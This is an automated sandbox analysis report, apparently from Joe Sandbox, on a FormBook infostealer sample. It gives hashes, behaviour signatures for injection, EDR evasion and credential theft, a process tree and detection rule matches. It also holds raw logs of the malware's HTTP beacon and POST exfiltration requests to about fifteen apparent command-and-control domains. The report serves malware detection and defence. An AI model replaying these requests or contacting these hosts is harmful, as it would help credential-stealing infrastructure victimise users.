Windows Analysis Report
XhAQ0Rk63O.exe

Overview

General Information

Sample name: XhAQ0Rk63O.exe (renamed because original name is a hash value)
Original sample name: b365215db2a43106d746921ff99c7a8a6c2fc80965dc1567480a38021366848d.exe
Analysis ID: 1550245
MD5: 1641128999c6968823ca0d92cb8f0ece
SHA1: eb766aacb3c3ee714f728dcddd4ac02168c1225e
SHA256: b365215db2a43106d746921ff99c7a8a6c2fc80965dc1567480a38021366848d
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • XhAQ0Rk63O.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\XhAQ0Rk63O.exe" MD5: 1641128999C6968823CA0D92CB8F0ECE)
    • svchost.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\XhAQ0Rk63O.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • IislGDEHlLEZDm.exe (PID: 5188 cmdline: "C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • net.exe (PID: 7724 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • firefox.exe (PID: 7960 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.1574269815.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3866219592.0000000002E90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3863689053.0000000002960000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3866264697.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1574620078.0000000003A90000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", CommandLine: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", ParentImage: C:\Users\user\Desktop\XhAQ0Rk63O.exe, ParentProcessId: 7556, ParentProcessName: XhAQ0Rk63O.exe, ProcessCommandLine: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", ProcessId: 7648, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", CommandLine: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", ParentImage: C:\Users\user\Desktop\XhAQ0Rk63O.exe, ParentProcessId: 7556, ParentProcessName: XhAQ0Rk63O.exe, ProcessCommandLine: "C:\Users\user\Desktop\XhAQ0Rk63O.exe", ProcessId: 7648, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-06T15:59:25.999363+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.8 | 49706 | TCP
2024-11-06T16:00:03.959754+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.8 | 49712 | TCP


                AV Detection

Source: XhAQ0Rk63O.exe; ReversingLabs: Detection: 75%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.1574269815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3866219592.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3863689053.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3866264697.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1574620078.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1575222037.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.3871219369.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: XhAQ0Rk63O.exe; Joe Sandbox ML: detected
Source: XhAQ0Rk63O.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.1542553129.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542599146.000000000363B000.00000004.00000020.00020000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000003.1652356035.0000000000B00000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IislGDEHlLEZDm.exe, 00000003.00000002.3863687071.000000000018E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: XhAQ0Rk63O.exe, 00000000.00000003.1419274394.0000000004890000.00000004.00001000.00020000.00000000.sdmp, XhAQ0Rk63O.exe, 00000000.00000003.1423114263.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1452027710.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453866402.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871197453.000000000355E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871197453.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.1574242672.000000000306C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1581774696.0000000003212000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: XhAQ0Rk63O.exe, 00000000.00000003.1419274394.0000000004890000.00000004.00001000.00020000.00000000.sdmp, XhAQ0Rk63O.exe, 00000000.00000003.1423114263.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1452027710.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453866402.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 00000004.00000002.3871197453.000000000355E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871197453.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.1574242672.000000000306C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1581774696.0000000003212000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.000000000437C000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3866320365.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.1869973892.00000000038FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.000000000437C000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3866320365.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.1869973892.00000000038FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.1542553129.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542599146.000000000363B000.00000004.00000020.00020000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000003.1652356035.0000000000B00000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe; Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452126
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe; Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 0_2_0045C999
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe; Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00436ADE
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe; Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00434BEE
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe; Code function: 0_2_0045DD7C FindFirstFileW,FindClose, 0_2_0045DD7C
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe; Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD29
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe; Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 0_2_00436D2D
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe; Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442E1F
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe; Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00475FE5
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe; Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8D
Source: C:\Windows\SysWOW64\net.exe; Code function: 4_2_0297C820 FindFirstFileW,FindNextFileW,FindClose, 4_2_0297C820
Source: C:\Windows\SysWOW64\net.exe; Code function: 4x nop then xor eax, eax 4_2_02969D30
Source: C:\Windows\SysWOW64\net.exe; Code function: 4x nop then mov ebx, 00000004h 4_2_032004E8

                Networking

                Source: DNS query: www.066bet.xyz
Source: Joe Sandbox View; IP Address: 128.65.195.180
Source: Joe Sandbox View; IP Address: 199.59.243.227
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49706
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49712
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe; Code function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile, 0_2_0044289D
Source: global traffic; HTTP traffic detected: GET /yjfe/?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8j HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.corpseflowerwatch.org | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /gnvu/?A60d=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhnX66OqoqX9RpA5jutgMYieahfkhQyed5OXn1sKSNeZ5Og==&QftlZ=CnaPg8j HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.4nk.education | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /ym43/?A60d=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRotDS7tV9/yFnz3DJaYsKbhs+4gmff4HURwuAtNrFLN6oA==&QftlZ=CnaPg8j HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.migraine-massages.pro | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /d26j/?A60d=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN3m5Pan90DEVx2dAgRBkFBhEuf5ZPCqUAEh8OTzHmZFBqDA==&QftlZ=CnaPg8j HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.vnxoso88.art | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /afcr/?QftlZ=CnaPg8j&A60d=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8ACfrzzZPLOA7u6erlXN+FNsi+iqdwi1J/UOdsVhZq9rVpg== HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.pluribiz.life | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /1iqa/?A60d=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQhWC34rDkgUmQuOVrwdU4dvabP7OAcppow6eveUPberj5Ig==&QftlZ=CnaPg8j HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.kdtzhb.top | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /293d/?QftlZ=CnaPg8j&A60d=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGRb4J0orjC0OEaNIQeyVbD4LqlGxYuRKPk3SC/Id1jS91tA== HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.evoo.website | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /vdvc/?A60d=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczReOZAYqscKe8aXj18ECqhEbYKMceViC9DOJ/t3u5W+eFfLA==&QftlZ=CnaPg8j HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.astorg-group.info | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /0m8a/?A60d=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp7faj8lfUqZu5U5j35YEbCksI5bqMK6zFCmtbYf508vfTQ==&QftlZ=CnaPg8j HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.fiqsth.vip | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /ezyn/?A60d=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLO8/BWEb4M0fVL3Jy75+c2YHHmj0ZqdnbhQxCwgxfTHy3A==&QftlZ=CnaPg8j HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.bio-thymus.com | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /9ezc/?QftlZ=CnaPg8j&A60d=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+Pd9/3gTJl/Aqae97oJsSOpJi/Ea/U3//DCXx5U5lNSou+g== HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.wukong.college | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /95c0/?A60d=0qxxa8sZzaTQGsV+IlYRUJribMqFDMjNP0hPtjDvBTL1oNFysxcHk25mntsLFh1aL6dJocQb44ZX+yLzRXP4WstlnU8yga+uYMkloLbvjpkOD6D/HpsAt4GJWXyRqysedQ==&QftlZ=CnaPg8j HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.vehiculargustav.click | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /fjsq/?A60d=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSZEPIXc/cFilHIaBazWG3FiJEFNWk2bg6JB0HDDUtnLYhkw==&QftlZ=CnaPg8j HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.yushaliu.online | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /ucmb/?QftlZ=CnaPg8j&A60d=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLyg6sZMK+n6SnxPYLsSNnFHqgmG+z3/fMKl0erdP4+1Q9hQ== HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.marketprediction.app | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic; DNS traffic detected: DNS query: www.corpseflowerwatch.org
Source: global traffic; DNS traffic detected: DNS query: www.4nk.education
Source: global traffic; DNS traffic detected: DNS query: www.migraine-massages.pro
Source: global traffic; DNS traffic detected: DNS query: www.vnxoso88.art
Source: global traffic; DNS traffic detected: DNS query: www.pluribiz.life
Source: global traffic; DNS traffic detected: DNS query: www.kdtzhb.top
Source: global traffic; DNS traffic detected: DNS query: www.evoo.website
Source: global traffic; DNS traffic detected: DNS query: www.astorg-group.info
Source: global traffic; DNS traffic detected: DNS query: www.fiqsth.vip
Source: global traffic; DNS traffic detected: DNS query: www.bio-thymus.com
Source: global traffic; DNS traffic detected: DNS query: www.wukong.college
Source: global traffic; DNS traffic detected: DNS query: www.vehiculargustav.click
Source: global traffic; DNS traffic detected: DNS query: www.bulls777.pro
Source: global traffic; DNS traffic detected: DNS query: www.yushaliu.online
Source: global traffic; DNS traffic detected: DNS query: www.marketprediction.app
Source: global traffic; DNS traffic detected: DNS query: www.066bet.xyz
Source: unknown; HTTP traffic detected: POST /gnvu/ HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Content-Type: application/x-www-form-urlencoded | Content-Length: 205 | Cache-Control: max-age=0 | Connection: close | Host: www.4nk.education | Origin: http://www.4nk.education | Referer: http://www.4nk.education/gnvu/ | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36 | Data Raw: 41 36 30 64 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 58 6d 4b 4d 34 43 6f 32 4d 6f 4c 42 4e 72 4a 77 6a 70 30 63 44 6d 35 39 72 4e 4b 48 4b 71 4d 54 55 50 67 6f 4b 51 3d | Data Ascii: A60d=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTXmKM4Co2MoLBNrJwjp0cDm59rNKHKqMTUPgoKQ=
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | content-type: text/html | transfer-encoding: chunked | content-encoding: gzip | vary: Accept-Encoding | date: Wed, 06 Nov 2024 15:00:21 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close | Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 